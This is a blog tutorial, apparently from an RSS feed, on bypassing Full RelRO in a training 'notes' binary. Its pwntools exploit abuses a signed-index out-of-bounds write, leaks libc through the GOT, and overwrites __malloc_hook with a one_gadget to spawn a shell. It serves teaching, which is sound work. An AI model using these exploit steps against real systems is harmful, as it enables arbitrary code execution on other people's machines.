Jekyll2023-10-03T12:37:42+00:00https://made0x78.com/feed.xmlmade0x78 Securitymade0x78Binary Exploitation Series (7): Full RelRO Bypass2019-06-12T00:00:00+00:002019-06-12T00:00:00+00:00https://made0x78.com/bseries-fullrelro<p>Hello everyone! Today we are going to bypass <code class="language-plaintext highlighter-rouge">Full RelRO</code> by using a relative write out-of-bounds vulnerability. Like last time, we have access to the binary (no libc provided) and we have to leak some information to identify the correct libc version. You can download the <a href="/downloads/bseries/chapter_7/notes">challenge</a> along with the <a href="/downloads/bseries/chapter_7/notes.c">source code</a>.<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ checksec [+] checksec for './notes' Canary : Yes NX : Yes PIE : No Fortify : No RelRO : Full ASLR is activated ;-) </code></pre></div></div> <h2 id="relocation-read-only-relro">Relocation Read-Only (RelRO)</h2> <p>If we have the possibility to abuse a vulnerability to write to arbitrary locations in memory (e.g. format string attacks, control over pointers, out-of-bounds write …) instead of a basic buffer overflow vulnerability like last times, we need to figure out how to get control over the execution flow (<code class="language-plaintext highlighter-rouge">RIP/EIP</code>). One way to achieve this is to overwrite the Global Offset Table (GOT) which is a look-up table for dynamically linked ELF binaries to resolve functions that are located in shared libraries. For example, our target uses the function <code class="language-plaintext highlighter-rouge">puts</code>. We could overwrite the entry for <code class="language-plaintext highlighter-rouge">puts</code> in the GOT with <code class="language-plaintext highlighter-rouge">0x4141414141414141</code> and the next time the function is called it would jump to our specified address. To prevent such attacks RelRO was introduced. If fully activated, the linker resolves all the functions the binary uses at the beginning of execution and sets the GOT as read-only. <a href="https://www.redhat.com/en/blog/hardening-elf-binaries-using-relocation-read-only-relro">More details at www.redhat.com</a></p> <p>In the following, we have a comparison of the <code class="language-plaintext highlighter-rouge">notes</code> challenge where we can see that the functions are successfully resolved during startup. Each compiled challenge is started in <code class="language-plaintext highlighter-rouge">gdb</code> with the command <code class="language-plaintext highlighter-rouge">start</code></p> <p><b>Partial RelRO active (not read only, no resolves at startup):</b></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ disassemble main ... 0x0000000000400d63 &lt;+160&gt;: call 0x400720 &lt;memset@plt&gt; 0x0000000000400d68 &lt;+165&gt;: jmp 0x400d0b &lt;main+72&gt; End of assembler dump. gef➤ disassemble 0x400720 Dump of assembler code for function memset@plt: 0x0000000000400720 &lt;+0&gt;: jmp QWORD PTR [rip+0x20191a] # 0x602040 0x0000000000400726 &lt;+6&gt;: push 0x5 0x000000000040072b &lt;+11&gt;: jmp 0x4006c0 End of assembler dump. gef➤ x/20gx 0x602040 // calls for dynamic resolver // e.g. memset@plt 0x602040: 0x0000000000400726 0x0000000000400736 0x602050: 0x0000000000400746 0x0000000000400756 </code></pre></div></div> <p>After the first resolve, the pointer at <code class="language-plaintext highlighter-rouge">0x602040</code> would be replaced with the real address of <code class="language-plaintext highlighter-rouge">memset</code> located in libc.</p> <p><b>Full RelRO active:</b></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ disassemble main ... 0x0000000000400d63 &lt;+160&gt;: call 0x400720 &lt;memset@plt&gt; 0x0000000000400d68 &lt;+165&gt;: jmp 0x400d0b &lt;main+72&gt; End of assembler dump. gef➤ disassemble 0x400720 Dump of assembler code for function memset@plt: 0x0000000000400720 &lt;+0&gt;: jmp QWORD PTR [rip+0x2018a2] # 0x601fc8 0x0000000000400726 &lt;+6&gt;: push 0x5 0x000000000040072b &lt;+11&gt;: jmp 0x4006c0 End of assembler dump. gef➤ x/20gx 0x601fc8 //libc functions already resolved 0x601fc8: 0x00007ffff7b72f50 0x00007ffff7a8de70 0x601fd8: 0x00007ffff7b72ad0 0x00007ffff7a7b070 Libc (vmmap) 0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so </code></pre></div></div> <h2 id="target">Target</h2> <p>The target is a little bit longer than before but not complex. We have a “customer line” and each customer has the opportunity to save, edit and show a note. A customer has 3 options to edit a note:</p> <ol> <li>Replace substring</li> <li>Replace character at position</li> <li>Overwrite whole note</li> </ol> <p>Read the source code, play with the binary and understand the behavior of the challenge.</p> <h2 id="analysis--exploitation">Analysis &amp; Exploitation</h2> <p>In one of the edit functions is a vulnerability which will lead to an out-of-bounds write. Try to find the vulnerability by yourself.</p> <p><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <b>Hint: In the second option!</b> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> Okay, did you find it?<br /> Let’s analyze the function:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">string_replace_char</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">pos</span><span class="p">;</span> <span class="kt">char</span> <span class="n">character</span><span class="p">;</span> <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span> <span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Usage: &lt;position&gt;,&lt;new character&gt;</span><span class="se">\n</span><span class="s">&gt; "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">" %d,%c"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pos</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">character</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">pos</span> <span class="o">&gt;=</span> <span class="n">MAX_BUF</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Result is out of range."</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">note</span><span class="p">[</span><span class="n">pos</span><span class="p">]</span> <span class="o">=</span> <span class="n">character</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Your current note is %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">note</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Done? (YES) "</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">" %4s"</span><span class="p">,</span> <span class="n">input</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">"YES"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">strcmp</span><span class="p">(</span><span class="n">input</span><span class="p">,</span> <span class="s">"yes"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Saved!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>First, some variables are defined which are later used to replace one character at the time. After that, we can use a command-line style replace function to replace characters in our note. The first thing to notice is, that we could overwrite a null byte if our string is smaller than the max length. But since the note is always cleared with <code class="language-plaintext highlighter-rouge">memset</code> for each customer we cannot abuse this to leak data of a previous customer. If we look carefully we can see that the position is verified with <code class="language-plaintext highlighter-rouge">if(pos &gt;= MAX_BUF-1)</code>. But as we remember, the position variable is defined as a (signed) integer and therefore, we can also use negative values! A possible fix would be a change of the type to <code class="language-plaintext highlighter-rouge">unsigned int</code>.</p> <p>Let’s confirm the relative out-of-bounds write. Steps to reproduce:</p> <ul> <li>Start the challenge: <code class="language-plaintext highlighter-rouge">gdb notes</code> -&gt; <code class="language-plaintext highlighter-rouge">run</code></li> <li>Enter customer name: “AAAA”</li> <li>Enter new note <ul> <li>Option “2”</li> <li>“BBBB”</li> </ul> </li> <li>Edit note with character replace <ul> <li>“3”</li> <li>“2”</li> <li>“-1,C”</li> <li>“-2,C”</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">CTRL-C</code></li> </ul> <p>Use the command <code class="language-plaintext highlighter-rouge">vmmap</code> to display the virtual memory map.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ vmmap Start End Offset Perm Path 0x0000000000400000 0x0000000000402000 0x0000000000000000 r-x /.../notes 0x0000000000601000 0x0000000000602000 0x0000000000001000 r-- /.../notes 0x0000000000602000 0x0000000000603000 0x0000000000002000 rw- /.../notes 0x0000000000603000 0x0000000000624000 0x0000000000000000 rw- [heap] </code></pre></div></div> <p>Examine the memory:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ x/20gx 0x0000000000602000 0x602000: 0x0000000000000000 0x0000000000000000 0x602010: 0x0000000000000000 0x0000000000000000 0x602020 &lt;stdout@@GLIBC_2.2.5&gt;: 0x00007ffff7dd0760 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040 &lt;stderr@@GLIBC_2.2.5&gt;: 0x00007ffff7dd0680 0x0000000000000000 0x602050: 0x0000000000000000 0x0000000000000000 0x602060 &lt;customer_name&gt;: 0x0000000000603260 0x0000000000000000 0x602070: 0x0000000000000000 0x4343000000000000 0x602080 &lt;note&gt;: 0x0000000042424242 0x0000000000000000 0x602090 &lt;note+16&gt;: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>If we take a look at the line with address <code class="language-plaintext highlighter-rouge">0x602070</code> we see our C’s (0x43) which are definitely out of bounds because the note starts at <code class="language-plaintext highlighter-rouge">0x602080</code>. We confirmed an out-of-bounds write with negative values. That means, that we can overwrite everything before the note array. In this case, the <code class="language-plaintext highlighter-rouge">customer_name</code> is interesting because it is a pointer to a string in the heap (allocated via <code class="language-plaintext highlighter-rouge">malloc</code> in <code class="language-plaintext highlighter-rouge">main()</code>). It is also possible to write to its destination (via “Who is next?” in <code class="language-plaintext highlighter-rouge">main()</code>) and we can read the value (<code class="language-plaintext highlighter-rouge">printf</code> in <code class="language-plaintext highlighter-rouge">serve()</code> and <code class="language-plaintext highlighter-rouge">main()</code>). Very powerful!</p> <p>During exploit development, you should start writing your exploit as soon as possible. Multiple tasks can be easily automated and will save you a lot of time. So, let’s start writing our exploit!</p> <p>Steps:</p> <ul> <li>Load and start the binary via <code class="language-plaintext highlighter-rouge">process</code> of <code class="language-plaintext highlighter-rouge">pwntools</code></li> <li>Define functions for different parts of the application <ul> <li><code class="language-plaintext highlighter-rouge">recv_help</code></li> <li><code class="language-plaintext highlighter-rouge">save_note</code></li> <li>…</li> </ul> </li> <li>Get control over <code class="language-plaintext highlighter-rouge">customer_name</code></li> <li>Leak libc pointer via GOT (read is still possible)</li> <li>Identify libc version</li> <li>Compute libc base address</li> <li>Set a malloc hook (more later) in libc to point to <code class="language-plaintext highlighter-rouge">0x4141414141414141</code></li> <li>Find one-shot gadgets and set the malloc hook to point to the gadget</li> <li>Profit!</li> </ul> <p>The first two parts are easy and only the code will be shown here. Try it by yourself. :) <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="n">process</span><span class="p">,</span> <span class="n">remote</span><span class="p">,</span> <span class="n">gdb</span><span class="p">,</span> <span class="n">context</span><span class="p">,</span> <span class="n">p64</span><span class="p">,</span> <span class="n">u64</span><span class="p">,</span> <span class="n">ELF</span><span class="p">,</span> <span class="n">log</span> <span class="kn">from</span> <span class="nn">binascii</span> <span class="kn">import</span> <span class="n">hexlify</span> <span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"/lib/x86_64-linux-gnu/libc-2.27.so"</span><span class="p">)</span> <span class="n">chal</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./notes"</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./notes"</span><span class="p">)</span> <span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span><span class="s">""" """</span><span class="p">)</span> <span class="k">def</span> <span class="nf">recv_help</span><span class="p">():</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"want to do, "</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"?</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">save_note</span><span class="p">(</span><span class="n">note</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"2"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">note</span><span class="p">)</span> <span class="c1"># Who is next? </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"next?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"AAAA"</span><span class="p">)</span> <span class="c1"># dummy </span> <span class="n">recv_help</span><span class="p">()</span> <span class="n">save_note</span><span class="p">(</span><span class="s">"BBBB"</span><span class="p">)</span> <span class="c1"># dummy </span><span class="n">recv_help</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># keeps everything open </span></code></pre></div></div> <p>We created a customer and successfully saved a note. Next, we have to find the offset to the <code class="language-plaintext highlighter-rouge">customer_name</code>. This can be done with <code class="language-plaintext highlighter-rouge">gdb</code>. Run the script, go to the <code class="language-plaintext highlighter-rouge">gdb</code> window, type <code class="language-plaintext highlighter-rouge">continue</code> and let it run. After it has paused (reads from stdin), we press <code class="language-plaintext highlighter-rouge">CTRL-C</code> to be able to type <code class="language-plaintext highlighter-rouge">gdb</code> commands. We show the memory map and print the section where the not initialized variables are stored.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ vmmap Start End Offset Perm Path 0x0000000000400000 0x0000000000402000 0x0000000000000000 r-x /.../notes 0x0000000000601000 0x0000000000602000 0x0000000000001000 r-- /.../notes 0x0000000000602000 0x0000000000603000 0x0000000000002000 rw- /.../notes 0x0000000000795000 0x00000000007b6000 0x0000000000000000 rw- [heap] gef➤ x/20gx 0x0000000000602000 0x602000: 0x0000000000000000 0x0000000000000000 0x602010: 0x0000000000000000 0x0000000000000000 0x602020 &lt;stdout@@GLIBC_2.2.5&gt;: 0x00007f95b4b01760 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040 &lt;stderr@@GLIBC_2.2.5&gt;: 0x00007f95b4b01680 0x0000000000000000 0x602050: 0x0000000000000000 0x0000000000000000 0x602060 &lt;customer_name&gt;: 0x0000000000795260 0x0000000000000000 0x602070: 0x0000000000000000 0x0000000000000000 0x602080 &lt;note&gt;: 0x0000000042424242 0x0000000000000000 0x602090 &lt;note+16&gt;: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>Okay, <code class="language-plaintext highlighter-rouge">note</code> is at <code class="language-plaintext highlighter-rouge">0x602080</code> and our <code class="language-plaintext highlighter-rouge">customer_name</code> pointer is at <code class="language-plaintext highlighter-rouge">0x602060</code>. This is a difference of <code class="language-plaintext highlighter-rouge">0x20</code> (32). Therefore, we can overwrite the pointer at offset <code class="language-plaintext highlighter-rouge">-32</code> via the character replace mechanism.</p> <p>To make everything reusable and easy to use we define another function. This function implements the behavior of the edit function with character replace. It supports also strings because the string is enumerated while the offset is increased. Therefore, we can write arbitrary byte sequences relative to our note array. (As long as the index is smaller than <code class="language-plaintext highlighter-rouge">MAX_BUF-1</code>)</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">write</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span> <span class="n">log</span><span class="p">.</span><span class="n">debug</span><span class="p">(</span><span class="s">"Write(hex): %s @ %d"</span> <span class="o">%</span> <span class="p">(</span><span class="n">hexlify</span><span class="p">(</span><span class="n">data</span><span class="p">),</span> <span class="n">offset</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"3"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"note</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"2"</span><span class="p">)</span> <span class="k">for</span> <span class="n">idx</span><span class="p">,</span> <span class="n">byte</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">&gt;"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">offset</span><span class="o">+</span><span class="n">idx</span><span class="p">)</span> <span class="o">+</span> <span class="s">","</span> <span class="o">+</span> <span class="n">byte</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Done? (YES) "</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"NO"</span><span class="p">)</span> <span class="c1">#send dummy and save </span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">&gt;"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"0,A"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"YES"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Saved!</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> </code></pre></div></div> <p>Now, we can use the function as follows:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">write</span><span class="p">(</span><span class="o">-</span><span class="mi">32</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x4141414141414141</span><span class="p">))</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Id 1, Name: "notes", stopped, reason: SIGSEGV ... gef➤ x/20gx 0x0000000000602000 0x602000: 0x0000000000000000 0x0000000000000000 0x602010: 0x0000000000000000 0x0000000000000000 0x602020 &lt;stdout@@GLIBC_2.2.5&gt;: 0x00007fad4ad4d760 0x0000000000000000 0x602030: 0x0000000000000000 0x0000000000000000 0x602040 &lt;stderr@@GLIBC_2.2.5&gt;: 0x00007fad4ad4d680 0x0000000000000000 0x602050: 0x0000000000000000 0x0000000000000000 0x602060 &lt;customer_name&gt;: 0x4141414141414141 0x0000000000000000 0x602070: 0x0000000000000000 0x0000000000000000 0x602080 &lt;note&gt;: 0x0000000042424241 0x0000000000000000 0x602090 &lt;note+16&gt;: 0x0000000000000000 0x0000000000000000 </code></pre></div></div> <p>We successfully overwrote the <code class="language-plaintext highlighter-rouge">customer_name</code> and the application crashed because the address <code class="language-plaintext highlighter-rouge">0x4141414141414141</code> is not mapped and cannot be resolved by the following <code class="language-plaintext highlighter-rouge">printf</code> in <code class="language-plaintext highlighter-rouge">serve()</code>.</p> <p>Next, we have to leak libc function addresses. Let’s get the GOT offsets:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>objdump <span class="nt">-R</span> notes notes: file format elf64-x86-64 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 0000000000601ff0 R_X86_64_GLOB_DAT __libc_start_main@GLIBC_2.2.5 0000000000601ff8 R_X86_64_GLOB_DAT __gmon_start__ 0000000000602020 R_X86_64_COPY stdout@@GLIBC_2.2.5 0000000000602040 R_X86_64_COPY stderr@@GLIBC_2.2.5 0000000000601fa0 R_X86_64_JUMP_SLOT puts@GLIBC_2.2.5 0000000000601fa8 R_X86_64_JUMP_SLOT strlen@GLIBC_2.2.5 0000000000601fb0 R_X86_64_JUMP_SLOT __stack_chk_fail@GLIBC_2.4 0000000000601fb8 R_X86_64_JUMP_SLOT setbuf@GLIBC_2.2.5 0000000000601fc0 R_X86_64_JUMP_SLOT <span class="nb">printf</span>@GLIBC_2.2.5 0000000000601fc8 R_X86_64_JUMP_SLOT memset@GLIBC_2.2.5 0000000000601fd0 R_X86_64_JUMP_SLOT strcmp@GLIBC_2.2.5 0000000000601fd8 R_X86_64_JUMP_SLOT memcpy@GLIBC_2.14 0000000000601fe0 R_X86_64_JUMP_SLOT malloc@GLIBC_2.2.5 0000000000601fe8 R_X86_64_JUMP_SLOT __isoc99_scanf@GLIBC_2.7 </code></pre></div></div> <p>or use <code class="language-plaintext highlighter-rouge">pwntools</code> again:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">chal</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./notes"</span><span class="p">)</span> <span class="n">chal</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> </code></pre></div></div> <p>We just have to take an offset to a function in the GOT, overwrite the <code class="language-plaintext highlighter-rouge">customer_name</code> and exit the edit function to print the <code class="language-plaintext highlighter-rouge">customer_name</code> in <code class="language-plaintext highlighter-rouge">serve()</code>. For that, we have to edit our <code class="language-plaintext highlighter-rouge">recv_help</code> function to return the leak</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># return leak </span><span class="k">def</span> <span class="nf">recv_help</span><span class="p">():</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"want to do, "</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"?</span><span class="se">\n</span><span class="s">"</span><span class="p">)[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span> <span class="k">return</span> <span class="n">leak</span> </code></pre></div></div> <p>and leak the pointer</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">write</span><span class="p">(</span><span class="o">-</span><span class="mi">32</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">chal</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]))</span> <span class="c1"># GOT offset of puts </span><span class="n">leak</span> <span class="o">=</span> <span class="n">recv_help</span><span class="p">()</span> <span class="c1"># Pad leak with null bytes to use u64 # e.g. \x41\x41\x41 would be \x41\x41\x41\x00\x00\x00\x00\x00 </span><span class="n">leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"puts @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">leak</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>Verify it with <code class="language-plaintext highlighter-rouge">gdb</code>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ p puts $1 = {int (const char *)} 0x7f70208839c0 &lt;_IO_puts&gt; Script output: ... [*] puts @ 0x7f70208839c0 ... </code></pre></div></div> <p>We can leak more pointers and identify the libc version with <a href="https://libc.blukat.me/">blukat.me</a> like in <a href="/bseries-ret2libc/">Chapter 4</a>. Furthermore, we can compute the libc base which can be verified in <code class="language-plaintext highlighter-rouge">gdb</code> (<code class="language-plaintext highlighter-rouge">vmmap</code>).</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">libc_base</span> <span class="o">=</span> <span class="n">leak</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"libc base @ "</span> <span class="o">+</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span> </code></pre></div></div> <p><br /> “The GNU C Library lets you modify the behavior of malloc, realloc, and free by specifying appropriate hook functions.” [<a href="https://www.gnu.org/software/libc/manual/html_node/Hooks-for-Malloc.html">Hooks-for-Malloc</a>] To get <code class="language-plaintext highlighter-rouge">RIP</code> control we can modify these hooks of libc. First, compute the hooks address in memory based on the libc leaks.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">malloc_hook_address</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"__malloc_hook"</span><span class="p">]</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"__malloc_hook @ %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">malloc_hook_address</span><span class="p">))</span> </code></pre></div></div> <p>Set the <code class="language-plaintext highlighter-rouge">customer_name</code> pointer and use it to overwrite the “customer name” via <code class="language-plaintext highlighter-rouge">scanf</code> (in <code class="language-plaintext highlighter-rouge">main()</code>) which points to the hook.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># point customer_name to __malloc_hook </span><span class="n">write</span><span class="p">(</span><span class="o">-</span><span class="mi">32</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">malloc_hook_address</span><span class="p">))</span> <span class="c1"># exit and trigger next customer </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"5"</span><span class="p">)</span> <span class="c1"># exit </span> <span class="c1"># Who is next? </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"next?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x4141414141414141</span><span class="p">))</span> <span class="n">save_note</span><span class="p">(</span><span class="s">"DUMMY"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"3"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"note</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"2"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"0"</span><span class="o">*</span><span class="mh">0x10000</span> <span class="o">+</span> <span class="s">",A"</span><span class="p">)</span> <span class="c1"># trigger __malloc_hook </span></code></pre></div></div> <p>Segfault! We successfully overwrote the hook and got control over execution flow.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x7f8d1958f27b &lt;malloc+523&gt; jmp rax -&gt; $rax : 0x4141414141414141 </code></pre></div></div> <p>The final step is to find suitable one-shot gadgets and trigger an <code class="language-plaintext highlighter-rouge">execve</code> to get a shell.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>one_gadget &lt;identified libc&gt; 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL </code></pre></div></div> <p>Of course, you have to try all if some are not working because some constraints are not met.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">one_gadget</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4f322</span> <span class="c1"># Who is next? </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"next?"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="n">one_gadget</span><span class="p">))</span> <span class="p">....</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"0"</span><span class="o">*</span><span class="mh">0x10000</span> <span class="o">+</span> <span class="s">",A"</span><span class="p">)</span> <span class="c1"># trigger __malloc_hook </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"ls;"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>Using the second gadget we notice that on each run the response is different. This is because the values on the stack are different on each run and we have to try it more than once. After some tries, we get a response from the target and we executed our commands.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.... 